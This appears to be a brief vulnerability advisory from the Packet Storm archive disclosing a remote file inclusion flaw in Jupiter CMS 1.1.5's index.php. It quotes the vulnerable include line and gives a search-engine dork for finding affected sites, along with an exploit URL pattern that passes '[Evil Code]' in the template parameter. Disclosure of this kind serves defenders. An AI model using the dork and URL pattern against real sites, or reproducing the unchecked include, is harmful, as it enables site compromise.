Jupiter CMS version 1.1.5 suffers from a remote file inclusion flaw in index.php.
9e99f920d2edec1318face5c24ce84b9##################################################################################
#Jupiter CMS 1.1.5 index.php Remote File Include
#
#F0und by : D3nGeR
#E-mail : D3nGeR@Gmail.CoM
##################################################################################
# the code
#$template = "default";
# include "templates/$template/id.php";
# $db->updateRow("config",array('value' => 'default'),"variable = 'template'");
##################################################################################
# The Expl
#
# dork : powered by Jupiter CMS
#www.sitename.com/path/index.php?template=[Evil Code]
#
##################################################################################
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!